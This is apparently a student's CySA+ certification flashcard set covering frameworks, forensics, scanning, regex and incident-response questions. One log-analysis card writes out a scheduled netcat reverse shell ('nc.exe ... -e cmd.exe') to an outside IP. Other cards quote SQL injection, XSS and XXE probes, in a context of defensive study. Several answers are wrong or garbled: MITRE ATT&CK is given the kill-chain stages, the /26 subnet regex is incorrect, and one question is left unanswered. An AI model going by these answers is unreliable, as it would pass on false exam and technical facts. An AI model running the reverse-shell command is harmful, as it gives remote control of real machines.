CySA+ Flashcards
Vulnerability scan output: CVE-2011-3389
QID 42366 -SSLv3.0/TLSv1.0 Protocol weak CBC mode Server side vulnerability Check with: OpenSSL s_client-connect login.diontraining.com:443 -tls -cipher “AES:CAMELISA:SEED:3DES:DES”
What category should this be classified as?
Web application cryptography vulnerability
Your an analyst for a bank with offices in multiple states. You want to create an alert to detect if an employee from one bank office logs into a workstation in an office in another state. What type of detection and analysis are you configuring?
Behavior based
You conducted a security scan and found that port 389 is being used when connecting to LDAP for user authentication instead of port 636. The security software recommends you should remediate this. What should you do?
Change all devices and servers that support it to 636 because encrypted services run by default on 636
Your org has noticed an increase in the number of security incidents being detected. To better understand the situation and measure the effectiveness of your incident response process, what KPI (key performance indicator) could you use?
Alert volume: an increase may correlate with an increase of detected incidents
What tools can be used to conduct a banner grab from a web server on a remote host?
netcat, wget, and telnet
(ftp can’t do it)
A recent vulnerability scan found several vulnerabilities on an organization’s public facing IP address. To reduce the risk of a breach, which of the following vulnerabilities should be prioritized for remediation?
-A cryptographically weak cipher
-An HTTP response that reveals an internal IP address
-A website utilizing a self-signed SSL cert
*A buffer overflow that is know to allow remote code execution
An adversary compromised a web server in your network using a zero-day exploit and then uses it as a C2 server for further attacks. Which stage of the MITRE ATT&CK framework does the use of a C2 server illistrate?
Command and Control (C2)
Which analysis framework provides a graphical depiction of the attackers approach relative to a kill chain?
Diamond Model of Intrusion Analysis
Which framework provides the most explicit detail regarding how to mitigate or detect a given threat?
MITRE ATT&CK
According to the Center for Internet Securitiy’s system design recommendation, which control category would contain info on the best security practices to implement within SDLC?
Application Software Security
A cybersecurity analyst has received an alert that sensors continuously observe a well-know call home messages at their network boundary. Still, the orgs proxy firewall is properly configured to successfully drop the messages before leaving the network. What is the most likely cause of the message being sent?
An infected workstation is attempting to reach a C2 server
You’re investigating traffic involving 3 separate IP addresses (192.168.66.6, 10.66.6.10, 172.16.66.1). What REGEX expression would you use to be able to capture ONLY these 3 IP addresses?
\b(192.168.66.6)|(10.66.6.10)|(172.16.66.1)\b
You are conducting a quick nmap scan of a target network. You want to conduct a SYN scan but you don’t have the raw socket privileges on you workstation. What command should you use to conduct the SYN scan from your workstation?
nmap -sT
Nicole’s org doesn’t have the budget for 24/7 security monitoring of their network. To supplement her team, she contracts with a managed SOC service. What service provider would be best suited for this?
MSSP: Managed Security Service Provider
A companies CIO is concerned about the liability of a security vulnerability being exploited in their self-driving car where someone may die. What methodology would provide the single greatest mitigation if successfully implimented?
Formal methods of verification
What provides a standard nomenclature for describing security-related software flaws?
CVE
You suspect a system’s firmware has been compromised. What type of firmware would provide resistance against suck attack?
Trusted Firmware
What REGEX expression would provide the appropriate output when searching logs from only the IP subnet 172.161.1.224/26
\b172.161.1.(2[0-4][0-9]|25[0-5]|19[2-9])\b
What is least likely to be included in a data retention policy?
Classification Info
As a forensic analyst, what should you collect first?
L3 Cach(CPU registry), RAM Cache(System Memory), SSD(Storage Devices), Backup drives
Your company is adopting a cloud first architecture model. Management wants to decommission the on-prem SIEM and migrate it to the cloud. What issues could arise?
Legal and regulatory issues may prevent data migration to the cloud
Diamond Model of Intrusion Analysis
Framework for understanding the 4 key elements of cyber attacks. Adversary, victim, infrastructure, capability
MITRE ATT&CK
Framework detailing tactic, techniques, and procedures.
Reconnaissance · Weaponization · Delivery · Exploitation · Installation · Command & Control (C2) · Actions on Objectives
OWASP Testing Guide
Methodology for testing web application security
Cyber Kill Chain
Describes the stages of a cyber attack. Makes no allowances for an adversarial retreat
What secure coding practice ensures a character like < is translated into the < string when written to an HTML page?
Output Encoding
You are a cyber analyst at a privatly owned bank. Which regulations would have the greatest impact on your bank’s cybersecurity program?
GLBA
Gramm-Leach-Bliley Act
Federal law explaining how to protect customer’s private info
Root Cause Analysis
Involves investigating an incident to determine its origin and how it unfolded, with an aim of preventing similar incidents
Forensic Analysis
Through investigation thats focus in broader and often includes legal implications
What can prevent firmware downgrades?
eFuse
Intel-designed mechanism to allow software instructions to blow a transistor in the hardware chip
You see the following log entry. What is it and how to stop it?
sc config schedule start auto
net start schedule
at 10:42 ““c:\temp\nc.exe 123.12.34.12 443 -e cmd.exe””
The host is using the Windows Task Scheduler at 10:42 to run nc.exe from the temp folder to create a remote connection to 123.12.34.12
You should recommend removing the host from the network
What technique would provide the largest increase in security on a network with ICS, SCADA, and IOT devices?
User and entity behavior analytics
tcpdump
Primarily used for capturing and analyzing network packets
Faster than Wireshark
No GUI
What sanitization technique removes data, overwriting a hard drive with randoms 1s and 0s?
Clear
Which part in a federation provides services to members of the federation?
RP: Relying Party
IdP
Identity Provider
Provides identities, makes assertions about those identities and releases info about identity holders
SAML
Security Assertion Markup Language
Open standard for exchanging authentication & authorization data between parties between an IdP
SSO
Single Sign On
Authentication scheme that allows users to log in with a single ID and password to related but independent software systems across a federation
What technique is most likely to identify a buffer overflow vulnerability in an app during development?
Static code analysis
You are searching a Linux server for a possible backdoor during a forensic investigation. Which part of the file system should you search for evidence?
/etc/xinetd.conf
newer versions: sytemctl
According to MITRE ATT&CK framework what capability can identify and exploit a zero-day vulnerablity?
Developed
What type of solution would you classify an FPGA?
Anti-tamper
Field-Programmable Gate Array
WannaCry’s use of Eternal Blue represents which phase of the Cyber Kill Chain?
Weaponization
What is the most widely used web-application scanner?
ZAP
OWASP Zed Attack Proxy
What are 3 Infrastructure vulnerability scanners?
Qualys, OpenVAS, Nessus
What type of file is commonly used to store configuration settings for a macOS system?
plists
(property lists)
During a vulnerability scan you notice that the hostname www.diontraining.com is resolving to www.diontraining.com.akamized.net instead. Based on that info what do you suspect is true?
You scanned a CDN-hosted version of the site.
CDN: Content Delivery Network
Geographically distributed network of proxy servers
What is the proper order of the UEFI boot phases?
Security
Pre-EFI initialization
Driver Execution Environment
Boot Device Select
Transient System Load
Runtime
What proprietary tool is used to create forensic disk images without making changes to the original evidence?
FTK Imager
Memdump
Used to collect content within RAM on a given host
Autopsy
Open-source forensic tool suite
Which role validates the user’s identity when using SAML for authentication?
IdP
You need to sanitize hard drives from some leased workstations before returning them to a supplier. The hard drives contained sensitive data. What is the most appropriate proccess to ensure that data exposure doesn’t occur during this process?
Purge, validate, and document the sanitation of the drives
What technology can be used to ensure that users who log into a network are physically in the same building as the network they are attempting to authenticate on?
GPS location and NAC
What describes the infrastructure needed to support the other architectural domains in the TBGAF framework?
Technical architecture
Dion Training wants to implement tech within their corporate network to BEST mitigate risk that a zero-day virus might infect their workstations. What should be implemented FIRST?
Application Whitelisting
You conduct a vulnerability scan of a data center and notice that a managed interface for a virtualization platform is exposed to your vulnerability scanner. What network should the hypervisor’s management interface be exposed to, to ensure the best security of the virtualization platform?
Management Network
You have just returned from a business trip from a country with a high intellectual property theft rate. What precautions should you take before reconnecting your laptop to your corporate network?
Scan for malware
Physically inspect the laptop and compare it with images made before you left
You are trying to find some files deleted by a user on a Windows workstation. What 2 locations are most likely to contain the deleted files?
Recycling Bin
Slack Space
What does the Infrastructure component of the Diamond Model refer to?
The physical or virtual resources used (phishing)
Persistance
MITRE ATT&CK framework
Stage that describes how the adversary maintains a foothold in the network
Command and Control
MITRE ATT&CK framework
Represents the communication channel
You want to prevent hosts from connecting to known malware distribution domains. What type of solution should be used without deploying endpoint protection software or an IPS?
DNS Blackholing
Uses a list known domains/IPs belonging to malicious hosts and uses an internal DNS server to create a fake reply
An org want to choose an authentication protocol that can be used over an insecure network without implementing additional encryption services. What protocol should you use?
Kerberos
An analyst suspect that a trojan has victimized a Linux system. Which command should be run to determine where the current bash shell is being executed?
which bash
SCAP
Security Content Automation Protocol
Multi-purpose framework of specifications supporting automated configuration, vulnerability, and patch checking, tech control compliance activities, and security measurement
Security Onion
Free open-source Linux distro for intrusion detection, enterprise security monitoring, and log management
What utilizes a well-written set of carefully developed and tested scripts to orchestrate runbooks and generate consistent server builds across an enterprise?
Infrastructure as Code (IaC)
A forensic analyst needs to access a macOS encrypted drive that uses File Vault2. What are 3 means of unlocking the volume?
Extract the keys from iCloud
Retrieve the key from memory while the volume is mounted
Obtain the recovery key
You’re a security Admin and need to respond to an ongoing spearphishing campaign against your org. What should be used as a checklist of actions to perform to detect and respond to this particular incident?
Playbook
Runbook is an automated response
Input validation can prevent what vulnerabilities?
SQL Injection
Cross-Site Scripting
XML Injection
Directory Traversal
What is the lowest layer of bare-metal virtualization environment?
The physical hardware
What type of vulnerability scan would provide the best results if you want to determine if the target’s configuration settings are correct?
Credentialed Scan
Non-Credentialed Scan
Vulnerability scan that relies on external resources for configuration settings, which can be incorrect or altered
If you want to conduct an operating system identification during an nmap scan, what syntax should you use?
nmap -O
You need to verify the installation of a critical Windows patch on your org’s workstations. What method would be the most efficient to validate the current patch status for all Windows 10 workstations?
Use SCCM to validate patch status
Microsoft’s System Center Configuration Manager
You review Python script used in your org’s automation process. You notice the following line of code: os.system(‘rm -rfl’). What potential security concern does the code represent?
Command Injection
Which operating system feature is designed to detect malware that is loaded early in the system startup process or before the OS can load itself?
Measured Boot
If you post too much on social media like name, DOB, hometown,… it is easier for an attacker to conduct what type of attack?
Cognitive Password Attack
What authentication protocol was developed by Cisco to provide authentication, authorization, and accounting services?
TACACS+
Terminal Access Controller Access-Control System
What type of encryption would ensure the best security of a website?
TLS
You review the logs of a proxy server and saw the following URL: http://test.diontraining.com/index/php?id=1%20OR%2017-7%3d10
What type of attack has likely occured?
SQL Injection
A pentester is conducting an assessment of a wireless network that is secure using WPA2 Enterprise encryption. What are the 2 major differences between conducting reconnaissance of a wireless network vs wired?
Physical accessibility and Encryption
Management is concerned about rogue devices being attached to the network. What solutions would quickly provide the most accurate info that could be used to identify rogue devices on the network?
Router and Switch-based MAC address reporting
What automatically combines multiple disparate sources of info to form a complete picture of events for analysts to use during an incident response or when conducting proactive threat hunting?
Data Enrichment
You’re about to conduct forensics on a virtual machine. What process should be used to ensure that all of the data is acquired forensically?
Suspend the machine and copy the contents of the directory it resides in
What will an adversary do during the exploitation phase of the Lockheed Martin kill chain?
Take advantage of a software, hardware, or human vulnerability
Wait for a user to click on a malicious link
Wait for a malicious email attachment to be opened
When trying to thoroughly examine the security posture of a major e-commerce platform, which framework serves as an exhaustive guide dedicated explicitly to this purpose?
OWASP Testing Guide
Where should a forensic analyst search to find a list of the wireless networks that a laptop has previously connected to with a company-owned laptop?
Search the registry
What remediation strategies are the MOST effective in reducing the risk to an embedded ICS from a network-based compromise?
Segmentation
Disable unused services
What are 3 concerns when migrating to a serverless architecture?
Protection of endpoint security
Dependency on the cloud service provider
Limited disaster recovery options
A cyber analyst is reviewing the logs of a proxy server and saw the following URL: https://www.google.com/search?q=password+filetype%3xls+site%3Adiontraining.com&pws=0&filter=p.
What is true about the results of this search?
Personalization is turned off (site%3Adiontraining.com) and (&) disables personalization
Returns only files hosted at diontraining.com
(filetype%3xls, %3A is the hex-code for ‘:’) and (+) limits results
Returns only Microsoft Excel Spreadsheets
(q=password) and (+) have filetype equal to xsl
Which types of digital forensic investigations is most challenging due to the on-demand nature of the analyzed assests?
Cloud services
Your company has announced a change to an “API first” model of software development. As a cyber analyst you are immediately concerned about the possibility of an insecure deserialization vulnerability in this model. What is the primary basis for an attack against this vulnerability?
Accepting serialized objects from untrusted sources or the use of serialized non-primitive data may lead to remote code execution
What does a User Agent request a resource from when conducting a SAML transaction?
SP (Service Provider)
You company has just enabled key-based authentication on its SSH server. What action should be performed to secure the SSH server?
Disable password authentication for SSH
You are creating a script to filter some logs so that you can detect any suspected malware beaconing. What are some typical means of identifying a malware beacons behavior on the network?
The beaconing interval
The beacon’s persistence
The removal of known traffic
Policy
Contains procedures and guidelines covering appropriate priorities, actions, and responsibilities in the event of a security incident
Procedure
Provide detailed, tactical info for the CSIRT to respond to an incident
What method should a cyber analyst use to locate any instances on the network where passwords are being sent in cleartext?
Full packet capture
You need to determine the best way to test operating system patches in a lab environment before deploying them to your automated patch management system. Your network has several different OSs in use but you only have 1 machine available to test the patches. What is the best environment to use to perform the testing of the patches before deployment?
Virtualization
In the Colonial Pipeline ransomeware attack, the DarkSide ransomware group fulfilled their intent by encrypting files and demanding a ransom. Which phase of the Cyber Kill Chain does this represent?
Actions on Objectives
Lockheed Martin Kill Chain Stages
Reconnaissance
Weaponization
Delivery
Exploitation
Installation
Command & Control (C2)
Actions on Objectives
In the Cyber Kill Chain, at which stage does an attacker deliver the actual working part of the attack?
Exploitation
Exploitation-attacker leverages vulnerability to execute main part of attack
Weaponization-attacker creates malicious payload, does not deliver it
Riaan’s company runs critical web applications. During a vulnerability scan, Riaan found a serious SQL injection vulnerability in one of their web applications. The system cannot be taken offline to remediate the vulnerability. Which compensating control should be recommended until the system can be remediated?
A. Vulnerability scanning
B. Encryption
C. WAF
D. IPS
C. WAF
A cybersecurity analyst reviews the logs of a proxy server and saw the following URL, https://www.google.com/search?q=*%40diontraining.com
Which is true about the results of the search?
A. Returns all web pages containing an email address affiliated with diontraining.com
B. Returns all web pages containing the text diontraining.com
C. Returns all web pages hosted at diontraining.com
D. Returns no useful results
A. Returns all web pages containing an email address affiliated with diontraining.com
%40 is the hex code for @
The 2018 Drupalgeddon2 incident saw hackers actively exploiting a highly critical vulnerability (CVE-2018-7600) in Drupal content management system. Which versions of Drupal’s security patch would have remediated this?
A. Durpal 7.56/8.3.4
B. Durpal 7.54/8.2.7
C. Durpal 7.57/8.4.5
D. Durpal 7.58/8.5.1
D. Durpal 7.58/8.5.1
Which of the following functions is not provided by TPM?
A. User authentication
B. Random number generation
C. Sealing
D. Remote attestation
E. Binding
F. Secure Generation of cryptographic keys
A. User authentication
Which of the following is NOT a host-related indicator of compromise?
A. Memory Consumption
B. Beaconing
C. Processor Consumption
D. Drive Capacity Consumption
B. Beaconing
Beaconing is considered a network-related IoC
A cybersecurity analyst notices the following XML transaction while reviewing the communication logs for a public-facing application that receives XLM input directly from its clients: ]>&abc;
Based on the output, which is true?
A. The application is using parameterized queries to prevent XML injections
B. An XML External Entity (XXE) vulnerability has been exploited and its possible that that password has downloaded the file “ect/passwd”.
C. ISO-8859-1 only covers the Latin alphabet and may preclude other languages from being used
D. There is no concern since “/etc/passwd” does not contain any system passwords
B. . An XML External Entity (XXE) vulnerability has been exploited and its possible that that password has downloaded the file “ect/passwd”.
Which of the following are the two most important factors when determining a containment strategy?
A. Preservation of evidence
B. Identification of whether the intrusion is the primary attack or a secondary one
C. Prevention of an ongoing intrusion or data breach
D. Avoidance of alerting the attacker that they have been discovered
E. Ensuring the safety and security of all personnel
C & E
You’re a cybersecurity analyst who has been given the output from a system administrator’s Linux terminal. Based on the output, which of the following is true?
BEGIN OUTPU ————
#nmap win 2k16.local
Nmap scan report for win2k (192.168.2.15)
Host is up (0.132452s latency)
Not shown: 997 closed ports
Port. State. Service
22/tpc. open. ssh
80/tpc. open http
#nc win2k16.local 80
220 win2k16.local DionTraining SMTP Server (Postfix/2.4.1)
#nc win2k16.local
22 SSH-2.0-OpenSSH_7.2 Debian-2
#_——————– END OUTPUT
A. Your org has a vulnerable version of the SSH server software installed
B. Your email server has been compromised
C. Your email server is running on a non-standard port
D. Your web server has been compromised
C. Your email server is running on a non-standard port.
Output shows SMTP is running on port 80 and the standard port is 25.
A new security appliance was installed on a network as part of a managed service deployment. The vendor controls the appliance and the IT team cannot log in or configure it. The IT team is concerned about the appliance receiving the necessary updates. Which of the following should be performed to minimize the concern?
A. Scan and patch the device
B. Automatic Updates
C. Configuration management
D. Vulnerability scanning
D. Vulnerability scanning
Dion Training is concerned with the possibility of employees accessing another user’s workstation in secured areas without their permission. Which would BEST prevent this from happening?
A. Install security cameras in secure areas to monitor logins
B. Require biometric identification for user logins
C. Require username and password for user logins
D. Enforce a policy that requires passwords to be changed every 30 days
B. Require biometric identification for user logins
You company has just finished replacing all of its computers with brand new workstations. A coworker asks the company if she can have the old computers that are about to be thrown away so she can refurbish them be reinstalling a new OS and donate them. The owner thinks it’s a great idea but is concerned about the sensitive info on the drives. What is the best solution to sanitize or destroy the data while ensuring the computers will still be usable?
A. Purging
B. Shredding
C. Degaussing
D. Wiping
D. Wiping
Can’t reuse hare drive once it has been degaussed.
Generally can’t reuse after purging.
Which term is used in software development to refer to the method in which app and platform updates are committed to a production environment rapidly?
A. Continuous integration
B. Continuous monitoring
C. Continuous deployment
D. Continuous delivery
C. Continuous deployment
A major cyber incident has occurred at your org. As part of the incident response team you have been tasked with analyzing the incident, including who caused it, what systems were affected, when it occurred, where it originated from, and why it happened. What kind of report are you preparing?
A. Incident declaration report
B. Incident response report
C. Regulatory reporting
D. Root cause analysis report
B. Incident response report
The security team from Kelly Nexis Analytics has detected the Apache Log4j vulnerability in JIRA. What is a practical method for the team to eliminate this vulnerability?
A. Patching
B. Antivirus Software
C. Virtual Private Network
D. Firewall Implimentation
A. Patching
Which of the following vulnerability scanning tools would be used to conduct a web application vulnerability assessment?
A. OpenVAS
B. Nessus
C. Nikto
D. Qualys
C. Nikto
Which of the following has occurred if a device fails to activate because it has detected an unknown modification?
A. Improper authentication
B. Obfuscation
C. Self-checking
D. Failed trust foundry
C. Self-checking
Which of the following is a technique used in Secure Disposal?
A. Zero-fill
B. Degaussing
C. Erasing
D. Clearing
B. Degaussing
Clearing does not destroy
An SNMP sweep is being conducted but the sweep received no-response replies from multiple addresses that are believed to belong to active hosts. What does this indicate to a cybersecurity analyst?
A. The community string being used is invalid
B. Any listed answers may be true
C. The machines are not running SNMP servers
D. The machines are unreachable
B. Any listed answers may be true
Dion consulting group has been hired to analyze the cybersecurity model for a new videogame console system. The manufacturer’s team has come up with four recommendations to prevent intellectual property theft and piracy. As the cybersecurity consultant on this project, which of the following would you recommend implementing first?
A. Ensure that each individual console has its own unique key for decrypting individual licenses and tracking which console has purchases which game
B. Ensure that all screen capture content is visibly watermarked
C. Ensure that all games for the console are distributed as encrypted so that they can only be decrypted on the game console
D. Ensure that all games require excessive storage sizes so that it is difficult for unauthorized parties to distribute
A. Ensure that each individual console has its own unique key for decrypting individual licenses and tracking which console has purchases which game
Which of the following protocols is commonly used to collect information about CPU utilization and memory usage from network devices?
A. NetFlow
B. SNMP
C. MIB
D. SMTP
B. SNMP (Simple Network Management Protocol)
Which protocol is paired with OAuth2 to provide authentication of users in a federated identity management solution?
A. Kerberos
B. ADFS
C. OpenID Connect
D. SAML
C. OpenID Connect
What type of information will a Cisco switch log be configured to capture logs at level 7?
A. Emergencies
B. Warnings
C. Debugging
D. Errors
C. Debugging
0-Emergencies
A vulnerability scan has returned the following:
Detailed Results
10.56.17.21 (APACHE-2.4)
Windows Shares
Category: Windows
CVE ID: -
Vendor Ref: -
Bugtraq ID: -
Service Modified - 8.30.2017
Enumeration Results:
print$c:\windows\system32\spool\drivers
files c:\FileShare\Accounting
Temp c:\temp
What best describes the output?
A. There is no CVE present, so this is a false positive caused by Apache running on a Windows server
B. There is an unknown bug in an Apache server with no Bugtraq ID
C. windows Defender has a known exploit that must be resolved or patched
D. Connecting to the host using a null session allows enumeration of the share names on the host
D. Connecting to the host using a null session allows enumeration of the share names on the host
Your org is transitioning to a cloud environment and wants to ensure its new infrastructure is secure. Ehat tool could you utilize to assess the security of your cloud infrastructure?
A. Pacu
B. Nmap
C. Nessus
D. Burp Suite
A. Pacu
This is designed for AWS environments.
Nessus is not specifically designed for cloud infrastructure assessments
You are conducting an incident response and want to determine if any account-based IoCs exist in a compromised server. Which of the following would you NOT search for on the server?
A. Unauthorized sessions
B. Malicious processes
C. Off-hours usage
D. Failed logins
B. Malicious processes
Malicious process is host-based IoC and not directly associated with an account-based IoC
Which of the following actions should you perform during the post-incident activities of an incident response?
A. Create an incident summary reporting with in-depth technical recommendations for future resourcing and budgeting
B. Perform evidence retention in accordance with the timescale defined by the regulatory or legal impact of the incident
C. Ensure confidentiality of the lessons learned report by not sharing it beyond the incident response team who handled the investigation
D. Sanitize storage devices that contain an dd images collected to prevent liability arising from evidence collection
B. Perform evidence retention in accordance with the timescale defined by the regulatory or legal impact of the incident
A cybersecurity analyst has deployed a custom DLP signature to alert on any files that contain numbers in format of a social security number. Which of the following concepts within DLP is being utilized?
A. Classification
B. Statistical matching
C. Document matching
D. Exact data match
D. Exact data match
What port does LDAP run on?
389
You org has just migrated to provisioning its corporate desktops as virtual machines and accessing them using thin clients. The org believes this will enhance security since the desktop can be rewritten with a new baseline image every time the user logs into it. Based on this scenario, which technology has the organization adopted?
A. VPC
B. UEBA
C. VPN
D. VDI
D. VDI
VDI = Virtual Desktop Infrastructure
VPC = Virtual Private Cloud
UEBA = User and Entity Behavior Analytics
Which of the following is not normally part of an endpoint security suite?
A. IPS
B. Software firewall
C. VPN
D. Anti-virus
C. VPN
Natalie wants to create a backup of the permissions before making changes to the Linux workstation she will remediate. What Linux tool can she use to back up the permissions of the system’s complete directory structure?
A. iptables
B. chbkup
C. getfacl
D. aclman
C. getfacl
aclman and chbkup are not legit commands
iptables is to configure the firewall
During a simulated attack on your org’s network, the red team identified several vulnerabilities and successfully exfiltrated data. The red team then used these vulnerabilities and the steps they took to create an example of a possible real-world attack. Which framework does this attack sequence BEST represent?
A. MITRE ATT&CK
B. OWASP Testing Guide
C. Cyber Kill Chain
D. Diamond Model of Intrusion Analysis
C. Cyber Kill Chain
Matt is creating a scoping worksheet for an upcoming penetration test for his organization. Which of the following techniques is NOT usually included in a pen test?
A. Denial-of-service Attack
B. Physical Penetration Attempts
C. Reverse Engineering
D. Social Engineering
A. Denial-of-service Attack
You have been given access to a Windows system located on an Active Directory domain as part of a white box pen test. Which of the following commands would provide information about the other systems on this network?
A. net group
B. net use
C. net config
D. net user
B. net use
net group is only used on DCs
net user would show accounts
net config allow server and workstations services to be controlled once identified
During a port scan you discovered a service running on a registered port. Base on this, what do you know about this service?
A. The service is running on a port between 0-1023
B. The service’s name on the registered port
C. The service is running on a port between 1024 - 49151
D. The vulnerability status os the service on the registered port
C. The service is running on a port between 1024-49151
Which of the following categories of controls are firewalls, IDS, and a RADIUS server classified as?
A. Administrative Controls
B. Technical Controls
C. Physical Controls
D. Compensating Controls
B. Technical Controls
You just finished conducting a remote scan of a class C network block using the following command ‘nmap -sS 202.15.73.0/24’. The results only showed a single web server. Which of the following techniques would allow you to gather additional info about the network?
A. Use and IPS evasion technique
B. Scan using the -p 1-65535 flag
C. Usa a UDP scan
D. Perform a scan from on-site
D. Perform a scan from on-site
Which tool should a malware analyst utilize to track the registry’s changes and the file system while running a suspicious executable on a Windows system?
A. ProcDump
B. Autoruns
C. Process Monitor
D. DiskMon
C. Process Monitor
Autoruns show what programs are configured to run during bootup or login
What is a reverse proxy commonly used for?
A. Directing traffic to internal services if the contents of the traffic comply with the policy
B. Allowing access ti a virtual private cloud
C. To prevent unauthorized use of cloud services from the local network
D. To obfuscate the origin of a user within a network
A. Directing traffic to internal services if the contents of the traffic comply with the policy
During which incident response phase is the preservation of evidence performed?
A. Detection and analysis
B. Containment, eradication, and recovery
C. Preparation
D. Post-incident activity
B. Containment, eradication, and recovery
During a recent security incident, you, as an incident responder, documented each action and decision that took place, from the initial detection to final remediation. This detailed timeline could prove particularly useful for which part of the incident response reporting?
A. Impact
B. Executive summary
C. Lessons learned
D. Scope
C. Lessons learned
You’re analyzing the logs of a web server and see the following:
192.168.1.25 - - [05/Aug/2020:15:16:42 -0400] “Get /%27%27;!-%22%3CDION%3E=&{()}
HTTP/1.1” 404 310 “-“ “Mozilla/5.0 (X11; Linux x86_64; en-US; rv:1.9.0.12)Gecko/2009070812 Ubuntu/19.04 (disco dingo) Firefox/3.0.12”
Based on this, which following attack was attempted?
A. XML injection
B. Buffer overflow
C. SQL injection
D. XSS
D. XSS
The attack was obfuscated by the attacker using HTML encoding. The encoding of %27%27 translates to two single quote marks (‘ ‘).
You are analyzing DNS logs looking for indicators of compromise associated with the use of a fast-flux network. You are already aware that the names involved in this particular fast-flux network are longer than 50 characters and always end in a .org top-level domain. Which of the following REGEX expressions would you use to filter DNS traffic that matches this?
A. \b[A-Za-z0-9.-]{50,251}+.org
B. \b[A-Za-z0-9.-]{50,251}+.org
C. \b[A-Za-z0-9.-]{50,251}+.org
D. \b(A-Za-z0-9.-){50,251}|.org
A. \b[A-Za-z0-9.-]{50,251}+.org
+ means it matches between 50 and 251 instances of any of the preceding letters (A-Z, a-z, 0-9, period, and the minus symbol)
During the Sony Pictures hack in 2014, the attackers installed a wiper malware names Destover on Sony’s systems to erase data. Which phase of the Cyber Kill Chain does this represent?
A. Delivery
B. Installation
C. Reconnaissance
D. Actions and Objectives
B. Installation
A penetration tester is using a known vulnerability to compromise an Apache webserver. After they gain access to the server, what is their next step to pivot to a protected system behind the DMZ?
A. Vulnerability scanning
B. Patching
C. Privilege escalation
D. Installing additional tools
C. Privilege escalation
A cybersecurity analyst is reviewing the DNS logs for his company’s networks and sees the following:
$ cat dns.log | bro-cut
querygu2m9qhychvxrvh0eift.comoxboxkgtyx9veimcuyri.com4f3mvgt0ah6mz92frsmo.comasvi6d6ogplqyfhrn0p7.com5qlark642x5jbissjm86.com
Based on this potential IoC, which of the following hypotheses should you make to begin threat hunting?
A. The DNS server is running out of memory due to a memory resource exhaustion attack
B. Data exfiltration is being attempted by an APT
C. Fast flux DNS is being used for an attacker’s C2
D. The DNS server’s hard drive is being used as a staging location for a data exfiltration
C. Fast flux DNS is being used for an attacker’s C2
After a successful spear-phishing attack, an adversary has gained access to your organization’s network. The adversary then performs a Pass-the-Hash attack to gain administrative privileges, moved horizontally in the network, and finally exfiltrates sensitive data. What stage of the MITRE ATT&CK framework does this movement represent?
A. Lateral Movement
B. Exfiltration
C. Initial Access
D. Credential Access
A. Lateral Movement
You suspect that a service called explorer.exe on a Windows server is malicious, and you need to terminate it. Which of the following tools would NOT be able to terminate it?
A. sc
B. wmic
C. services.msc
D. secpol.msc
D. secpol.msc
secpol.msc = security policy auditor
In the preparation phase of the incident management life cycle, which aspect involved assembling and maintaining a collection of scripts, applications, and other software that can be used to respond to a cyber threat effectively?
A. Incident response plan
B. Business continuity disaster recovery
C. Tools
D. Playbooks
C. Tools
Evaluate the following log entry:
Jan 11 05:52:56 lx1 kernel: iptables INPUT drop IN=eth0 OUT= MAC=00:15:5d:01:ca:55:00:15:5d:01:ca:ad:08:00 SRC=10.1.0.102 DST=10.1.0.10 LEN=52 TOS=0x00 PREC=0x00 TTL=128 ID=3988 DF PROTO=TCP SPT=2583 DPT=23 WINDOW=64240 RES=0x00 SYN URGP=0
Based on this, which statements are true?
A.MAC filtering is enabled on the firewall
B. Packets are being blocked inbound to and outbound from the network
C. The packet was blocked outbound from the network
D. An attempted connection to the ssh service was prevented
E. The packet was blocking inbound to the network
F. An attempted connection to the telnet service was prevented
E. The packet was blocking inbound to the network
F. An attempted connection to the telnet service was prevented
When assessing risks to your organization’s IT infrastructure, which framework allows for prioritization based on the potential impact of threats?
A. ISO 31000
B. OWASP Top 10
C. NIST’s Cybersecurity Framework
D. Center for Internet Security (CIS) Top 20 Critical Security Controls
C. NIST’s Cybersecurity Framework
A cybersecurity analyst is working at a college that wants to increase its network’s security by implementing vulnerability scans of centrally managed workstations, student laptops, and faculty laptops. Any proposed solution must scale up and down as new students and faculty use the network. Additionally, the analyst wants to minimize the number of false positives to ensure accuracy in their results. The chosen solution must also be centrally-managed through an enterprise console. Which of the following scanning topologies would be BEST able to meet these requirements?
A. Combination of server-based and agent-based scanning engines
B. Passive scanning engine located at the core of the network infrastructure
C. Combination of cloud-based and server-based scanning engines
D. Active scanning engine installed on the enterprise console
D. Active scanning engine installed on the enterprise console
You have been hired to investigate a possible insider threat from a user names Terri. Which of the following commands would successfully look through all the log files in ‘/var/log’ for any references to “Terri” or “terri” on a Linux server?
A. find /var/log/ -exec grep -H -e “‘terri’ OR ‘Terri’” {}\;2> /dev/null
B. find /var/log/ -name .log -exec grep -H -e “‘Terri’ OR ‘terri’” {} \;2>/dev/null
C. find /var/log/ -exec grep -H -e “[Tt]erri” {} \;2> /dev/null
D. find /var/log/ -name “.log” -exec grep -H -e “[Tt]erri” {} \;2>/dev/null
C. find /var/log/ -exec grep -H -e “[Tt]erri” {} \;2> /dev/null
Ted, a file server admin, has notices that a large number of sensitive files have been transferred from a corporate workstation to an IP address outside of the local area network. Ted contacts his company’s security analyst, who verifies that the workstation’s anti-malware solution is up-to-date, and the network’s firewall is properly configured. What type of attack most likely occurred to allow the exfiltration of the files from the workstation?
A. Session hijacking
B. Zero-day
C. MAC spoofing
D. Impersonation
B. Zero-day
You are conducting a code review of a program and observe the following calculation of 0xffffffff+1 was attempted, but the result was returned as 0x0000000. Based on this, what type of exploit could be created against this program?
A. Password spraying
B. Integer overflow attack
C. Impersonation
D. SQL injection
B. Integer overflow attack
You are investigating traffic involving three separate IP addresses (192.168.66.6, 10.66.6.10, and 172.16.66.1). Which REGEX expression would you use to be able to capture ONLY those three IP addresses in a single statement?
A. \b[192.168.66.6]+[10.66.6.10]+[172.16.66.1]\b
B. \b(192.168.66.6)+(10.66.6.10)+(172.16.66.1)\b
C. \b[192.168.66.6]|[10.66.6.10]|[172.16.66.1]\b
D. \b(192.168.66.6)|(10.66.6.10)|(172.16.66.1)\b
A cybersecurity analyst is attempting to classify network traffic within an organization. The analyst runs the tcpdump command and receives the following:
$ tcpdump -n -i eth015:01:35.170763 IP 10.0.19.121.52497>11.154.12.121.ssh: P 105:157(52) ack 1806 win 16549
15:01:35.170776 IP 11.154.12.121.ssh>10.0.19.121.52397: P 23988:24136(148) ack 157 win 113
15:01:35.170894 IP 11.154.12.121.ssh>10.0.19.121.52497: P 24136:24380(244) ack 157 win 113
Which statement is true?
A. 11.154.12.121 is under attack from a host at 10.0.19.121
B. 11.154.12.121 is client that is accessing an SSH server over port 52497
C. 10.0.19.121 is a client that is accessing an SSH server over port 52497
D. 10.0.19.121 is under attack from a host at 11.154.12.121
